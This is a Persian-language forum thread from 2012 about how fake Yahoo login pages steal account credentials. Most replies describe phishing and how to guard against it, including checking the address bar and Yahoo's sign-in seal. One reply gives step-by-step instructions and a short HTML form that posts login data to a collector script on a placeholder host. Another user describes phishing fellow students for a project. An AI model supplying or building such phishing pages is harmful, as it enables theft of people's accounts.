زمان کنونی: ۰۵ دى ۱۴۰۳, ۰۶:۰۷ ب.ظ مهمان گرامی به انجمن مانشت خوش آمدید. برای استفاده از تمامی امکانات انجمن می‌توانید عضو شوید.
گزینه‌های شما (ورودثبت نام)

یک سوال در مورد هک کردن یاهو آی دی

ارسال:
۱۵ تیر ۱۳۹۱, ۰۹:۴۳ ب.ظ (آخرین ویرایش در این ارسال: ۱۵ تیر ۱۳۹۱ ۱۱:۴۱ ب.ظ، توسط arixooo.)
یک سوال در مورد هک کردن یاهو آی دی
تا حالا ۲ بار یاهو آی دی مو از دست دادم که هر ۲ بارش هم مقصر خودم بودم...اما این دفعه آخر تمام کانتکت هام رو جای دیگه بک آپ گرفته بودم...زیاد مشکلی نبود..

سوالی که دارم اینه که کسی میدونه چجوری این صفحاتی که شبیهه صفحه لاگین شدن یاهو است رو استفاده میکنن؟؟
به این صورته که یه لینک به شما میدن که صفحه یاهوتون باز میشه..اما اینجا اونجا نیست..وقتی اطلاعاتتون رو وارد میکنید جای باز کردن ایمیل شما..اطلاعاتتون رو واسه اون فرد میفرسته..

کسی اطلاعی داره؟؟

Real education must ultimately be limited to men who insist on knowing, the rest is mere sheep-herding
Erza Pound
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال:
۱۵ تیر ۱۳۹۱, ۰۹:۵۹ ب.ظ (آخرین ویرایش در این ارسال: ۱۵ تیر ۱۳۹۱ ۱۰:۰۰ ب.ظ، توسط ف.ش.)
هک کردن یاهو آی دی
من فقط میدونم به این صفحات میگن fake page و به این کار میگن phishing

فکر کنم تو نت سرچ کنید جواب سوالتون رو بگیرید.

مهمان عزیز شما قادر به مشاهده پیوندهای انجمن مانشت نمی‌باشید. جهت مشاهده پیوندها ثبت نام کنید.

If your success is not on your own terms, if it looks good to the world but does not feel good in your heart, it is not success at all.
(Anna Quindlen)
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال:
۱۵ تیر ۱۳۹۱, ۱۱:۵۰ ب.ظ
هک کردن یاهو آی دی
بله درسته .
فیک پیج.
تقریبا یه شگرد قدیمی از شگردهای هک.
در این صورت یک صفحه شبیه به صفحه لاگین یاهو ساخته میشه و شما پس از لاگین کردن آیدی و پسورد رو به جای اینکه برای احراز هویت به سرور یاهو ارسال کنه به ایمیل طرف یا به فرمی که طرف درخواست میده ساب میت میشه.
بسیار هم ساده است.
تقریبا الان فیک پیج ها منسوخ شدن.
البته جدیدا فیک پیج های سایت و درگاه پرداخت زیاد شده.
تنها راه جلوگیری و حفاظت در قبال این نوع حمله ها هم اینه همیشه باید به آدرس که داریم اطلاعات رو وارد میکنم توجه کنیم.
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال:
۱۶ تیر ۱۳۹۱, ۱۱:۱۷ ق.ظ
یک سوال در مورد هک کردن یاهو آی دی
وقتی می خواهید لاگین بشید به آدرس بار توجه کنید که آدرس یاهو باشه.

--------------------------------------------------------------------
"Example isn't another way to teach, it is the only way to teach!"
Albert Einstein
--------------------------------------------------------------------
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال:
۱۶ تیر ۱۳۹۱, ۰۳:۱۴ ب.ظ
یک سوال در مورد هک کردن یاهو آی دی
یه چیزه دیگه هم جدیدا واسه من پیش میاد که اگه آنتی فیلترت فعال باشه نمی تونی به مسنجر لاگین کنی(باید حتما غیرفعال باشه)...شاید واقعا از دستش نداده باشی !

تحمل مشقت به امید آسایش بهتر از آسایشی است که سختی به دنبال دارد.
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال:
۱۶ تیر ۱۳۹۱, ۰۳:۳۶ ب.ظ
RE: یک سوال در مورد هک کردن یاهو آی دی
(۱۶ تیر ۱۳۹۱ ۰۳:۱۴ ب.ظ)mthsh نوشته شده توسط:  اگه آنتی فیلترت فعال باشه نمی تونی به مسنجر لاگین کنی(باید حتما غیرفعال باشه)

اگر IP پروکسی سرور رو تو مسنجرت وارد کنی میتونی همزمان با آنتی فیل*تر هم لاگین کنی
اصلا یه روزایی هست که همه مسنجرا غیر فعال میشن... فقط همینطوری میتونی لاگین کنی!

هنر انسانهای بزرگ این است که

به دشواری کار نمی اندیشند،

بلکه به عظمت آنچه خواهند یافت فکر میکنند.
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
 سپاس‌گزاری شده توسط: Xilinx
ارسال:
۱۶ تیر ۱۳۹۱, ۰۴:۰۹ ب.ظ
یک سوال در مورد هک کردن یاهو آی دی
در مورد صفحات جعلی یا همون fake page ها باید بگم شما برای ساختن اونها نیاز به موارد زیر دارید:
۱- صفحه اصلی
۲- یکمی اطلاعات از php
۳- هاست رایگان php ساپورت

ببینید برای ساخت صفحه جعلی شما وارد صفحه لوگین یاهو میشین بعد اون رو ذخیره میکنید توی سیستم خودتون بعدش کد صفحه رو باز میکنید و دکمه sign in رو پیدا میکنید و کدش رو پاک میکنید و کد چند خطی که با php نوشتین رو جایگزین میکنید که این هم راحته اصلا اونجا میتونید یک فرم ارسال درخواست بسازین
<form method="post" action="www.x.com/get1.php">
<br>
<br>
<br><pre>
ID:<input type="text" name="id_text">
<pre>
Name:<input type="text" name="name_text">
&nbsp;&nbsp
<input type="submit">
</form>
البته این کد یکم نیاز به دستکاری به نسبت صفحه تقلبی ما داره
ما باید در get1.php که در یک هاست رایگان داریم اطلاعات ارسالی از این فرم که در صفحه یاهو جاسازی کردیم را با دو متغییر گرفته و ذخیره کنیم
در پایان خود این صفحه رو در فضا اپلود میکنیم و ادرسش رو برای قربانی ارسال میکنیم
حالا یک مشکل بزرگ داریم اونهم اینه که ما ادرس یاهوی ما مثلا شده

مهمان عزیز شما قادر به مشاهده پیوندهای انجمن مانشت نمی‌باشید. جهت مشاهده پیوندها ثبت نام کنید.

خوب یعنی طرف وقتی صفحه ما رو میبینه با نگاه به ادرس اون قضیه لو میره! چکار کنیم؟
برای این کار هم ما روش هایی داریم که من توضیح نمیدم برخی از اون روش ها بر میگرده به اسیب پذیری های مربوط به مرورگر ها و برخی هم استفاده از روش های ترکیبی برای اعتماد سازی قربانی و...

اما دیگه بسه. شلوغ نکنید!!!
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
 سپاس‌گزاری شده توسط: arixooo
ارسال:
۱۶ تیر ۱۳۹۱, ۰۴:۴۶ ب.ظ
یک سوال در مورد هک کردن یاهو آی دی
من پروژه دوره کارشناسیم در مورد حملات phishing بود
یه fake page هم پیاده سازی کردم و برای بدست آوردن داده های آماری به کلی از دانشجو هامون حمله کردم! Big Grin
پدر همه در اودم!!! مخصوصا اونایی که همیشه دم از امنیت و هکر بودن و این جور چیزا میزدن!!! وقتی قضیه رو گفتم قیافه هاشون دیدنی بود انصافا! Big Grin
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
 سپاس‌گزاری شده توسط: پروفسور
ارسال:
۱۶ تیر ۱۳۹۱, ۰۵:۲۲ ب.ظ
یک سوال در مورد هک کردن یاهو آی دی
خب یعنی به جز چک کردن آدرس بار، چه چیزای دیگه ای رو باید چک کنیم تا مطمئن شیم؟

آزادی این نیست که هر کس هر چه دلش خواست بکند، آزادی حقیقی قدرتی است که شخص را مجبور به انجام وظایف خود می کند.
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال: #۱۰
۱۶ تیر ۱۳۹۱, ۰۵:۳۸ ب.ظ (آخرین ویرایش در این ارسال: ۱۶ تیر ۱۳۹۱ ۰۵:۴۱ ب.ظ، توسط one hacker alone.)
یک سوال در مورد هک کردن یاهو آی دی
چرا راه های دیگه ای هم داره اما شما به همون ادرس که ۹۷% مطمئن هست اکتفا کن راه دیگه مثل چک کردن سورس صفحه و...
(۱۶ تیر ۱۳۹۱ ۰۴:۴۶ ب.ظ)MSZ نوشته شده توسط:  یه fake page هم پیاده سازی کردم و برای بدست آوردن داده های آماری به کلی از دانشجو هامون حمله کردم!

میشه بیشتر توضیح بدین. چون من ارتباط بین فیک پیج و اطلاعات اماری رو نمیدونم...! چه ربطی داره؟َ
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال: #۱۱
۱۶ تیر ۱۳۹۱, ۰۵:۵۷ ب.ظ
یک سوال در مورد هک کردن یاهو آی دی
من برای پیاده سازی حمله فیشینگ، یه فیک پیج درست کردم
و افراد قربانی این فیک پیج رو با صفحه اصلی اشتباه گرفتن و پسوردشون رو لو دادن!
من چون برای پروژه و در راه آموزشی این کار رو کردم، می خواستم نشون بدم که چند درصد ملت تو دام افتادن و چند درصد پسر بودن و چند درصد دختر و .... . خلاصه برای بدست آوردن یک سری آمار ها این کار رو کردم. منظورم از آمار اینا بود

و اما در مورد روش شناسایی fake pageها، اینکه به URL نگاه کنین میتونه کمک کنه و خیلی هم مطمئن نیست. خیلی اوقات از روش های Cross-Site Scripting استفاده میشه که به این راحتی ها نمیشه تشخیصش داد.

من سعی میکنم گزارش کتبی که از تز پایانی ام تهیه کردم رو اینجا قرار بدم تا بیشتر با phishing و روشهای مقابله با اون آشنا بشین. ولی چون قراره تو یکی از کنفرانس های داخلی ارائه بشه، باید حتما از استادم اجازه بگیرم و البته صبر کنم تا مهلت نهایی submit کردن مقالات این کنفرانس تموم بشه. و حتما بعدش در اولین فرصت آپلودش میکنم
مشاهده‌ی وب‌سایت کاربر یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
 سپاس‌گزاری شده توسط: ف.ش , one hacker alone , Parva , Mahbanoo313
ارسال: #۱۲
۰۵ مرداد ۱۳۹۱, ۰۲:۱۶ ب.ظ (آخرین ویرایش در این ارسال: ۰۵ مرداد ۱۳۹۱ ۰۲:۱۶ ب.ظ، توسط ف.ش.)
یک سوال در مورد هک کردن یاهو آی دی
یک راه جلوگیری از فیشینگ از طریق تنظیمات خود یاهو :
Protect users on this computer against password theft with a sign-in seal.

یک عکس یا نوشته که قابل تشخیص برای خودتون باشه انتخاب میکنید و هر بار که صفحه لاگین یاهو میاد باید اون عکس کنارش باشه، اگر نبود میتونید شک کنید که صفحه فیک هست.

البته باز این روش هم از نظر من نمیتونه کاملا جلوگیری کنه چون اگر هکر از دوستانتون باشه و با سیستم شما کار کرده باشه ممکنه نوشته یا عکس رو از روی سیستم شما دیده باشه و فیک پیج رو همراه با اون نوشته یا عکس بفرسته.


یک نکته دیگه برای جلوگیری از هک شدن : فایرفاکس این باگ رو داره که پسوردهای که سیو میشه نشون میده پس حواستون باشه چون ممکنه شما مثلا توی سیستم یه نفر با یک اکانت دیگه لاگین بشید واستون مهم هم نیست که صاحب سیستم وارد اکانت شما بشه پس پسورد رو سیو میکنید اما چون اون شخص میتونه پسورد رو ببینه اگه پسورد بقیه اکانتهاتون هم همین باشه احتمال داره با پسورد شما وارد بشه.

What is phishing?

Phishing - a play on the word "fishing" - is an attempt to steal your password and private account info. Phishers can set up fake web sites that look like those of trusted companies like Yahoo! to trick you into disclosing your user name and password. To learn more about phishing, visit the Yahoo! Security Center.

How does a sign-in seal protect me?

A sign-in seal is a secret between the computer you set it up on and Yahoo!. So when you sign in to Yahoo! from this computer, your sign-in seal tells you that you're seeing a genuine Yahoo! site, not a phishing site.

Why do I have to set up a seal on each computer I use?

Your sign-in seal is associated with your computer, not your ID. It is a convenient way to instantly recognize a genuine Yahoo! sign-in page and be sure that you're not on a page created by fraudsters attempting to steal your Yahoo! ID and password. Because we associate your sign-in seal with your computer, after you create a seal, there are no additional steps to signing in. Even if a phisher knows or guesses your ID or other personal information, they cannot use it to discover your sign-in seal. Note: Yahoo! will never ask for your Yahoo! ID or password in order to set up or display your sign-in seal.

What if I share this computer with family or friends?

If they use Yahoo! too, you should show them the sign-in seal you're creating for this computer. Even better, create a sign-in seal together so that everyone will be happy to use and recognize the seal.

What about public computers?

Always use care when signing in on public computers, such as those located in libraries or Internet cafes. Administrators at these locations may create sign-in seals to help you identify Yahoo! on these machines, but you should not replace one of these seals with your own. It's best to rely on other methods to ensure you're signing in to a genuine Yahoo! site.

Will this sign-in seal protect me on sites other than Yahoo!?

No. The sign-in seal that you create here will only appear on Yahoo! sign-in screens. For more information about how to protect yourself online no matter where you are, see the Yahoo! Security Center.

What if I don't see my sign-in seal?

You could be on a fraudulent site, but there might be other reasons why you can't see it. For example, someone else who uses your computer may have deleted or changed your seal. The cookies or files that identify your seal may have also been deleted from your computer.

If your success is not on your own terms, if it looks good to the world but does not feel good in your heart, it is not success at all.
(Anna Quindlen)
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
 سپاس‌گزاری شده توسط: sama2010


موضوع‌های مرتبط با این موضوع...
موضوع: نویسنده پاسخ: بازدید: آخرین ارسال
  دیالوگ های زیبا و به یادماندنی HighVoltage ۶۷ ۴۷,۳۱۱ ۲۰ خرداد ۱۴۰۳ ۱۰:۲۹ ق.ظ
آخرین ارسال: mostafaww
  خرید دیزل ژنراتور یک پیشنهاد عالی برای فرا ا tiaragenerators ۰ ۶۳۸ ۱۷ آبان ۱۴۰۲ ۰۱:۵۵ ب.ظ
آخرین ارسال: tiaragenerators
  فروش انواع دستگیره دیجیتال و هوشمند آریالاک arialock ۰ ۱,۱۱۴ ۲۶ تیر ۱۴۰۱ ۰۳:۲۹ ب.ظ
آخرین ارسال: arialock
  سوال در مورد صفحه بندی در سیستم عامل Azadam ۱ ۱,۸۷۹ ۱۳ دى ۱۴۰۰ ۱۱:۰۴ ق.ظ
آخرین ارسال: Azadam
  پیدا کردن دستگیره manager_66 ۵ ۵,۱۹۴ ۲۸ آذر ۱۴۰۰ ۱۲:۴۴ ب.ظ
آخرین ارسال: blackhalo1989
  معرفی استاد در دیتاماینینگ و بیگ دیتا heelii ۱ ۲,۴۵۱ ۲۶ اسفند ۱۳۹۹ ۰۱:۵۲ ب.ظ
آخرین ارسال: Happiness.72
  منبع خوب برای الکترونیک دیجیتال _student_98 ۱ ۲,۴۵۸ ۲۱ دى ۱۳۹۹ ۰۵:۴۴ ب.ظ
آخرین ارسال: Mehran jam
  تا به حال شده خدا فرصت زندگی کردن دوباره رو بهت بده؟مرگ از جلوی چشمات رد شده؟ abraham ۲۱ ۱۶,۳۱۷ ۲۰ دى ۱۳۹۹ ۱۰:۵۶ ب.ظ
آخرین ارسال: raam
  دو سوال در مورد درخت BST(درخت جستجوی دودویی) امیدوار ۳ ۵,۶۵۶ ۱۰ دى ۱۳۹۹ ۱۲:۰۴ ق.ظ
آخرین ارسال: marzi.pnh
  جایی برای پیدا کردن توابع آماده جاوااسکریپت f.b ۷ ۴,۶۵۹ ۲۰ آذر ۱۳۹۹ ۰۴:۰۸ ب.ظ
آخرین ارسال: calm

پرش به انجمن:

Can I see some ID?

به خاطر سپاری رمز Cancel

Feeling left out?


نگران نباش، فقط روی این لینک برای ثبت نام کلیک کن. رمزت رو فراموش کردی؟ اینجا به یادت میاریم! close

رمزت رو فراموش کردی؟

Feeling left out?


نگران نباش، فقط روی این لینک برای ثبت نام کلیک کن. close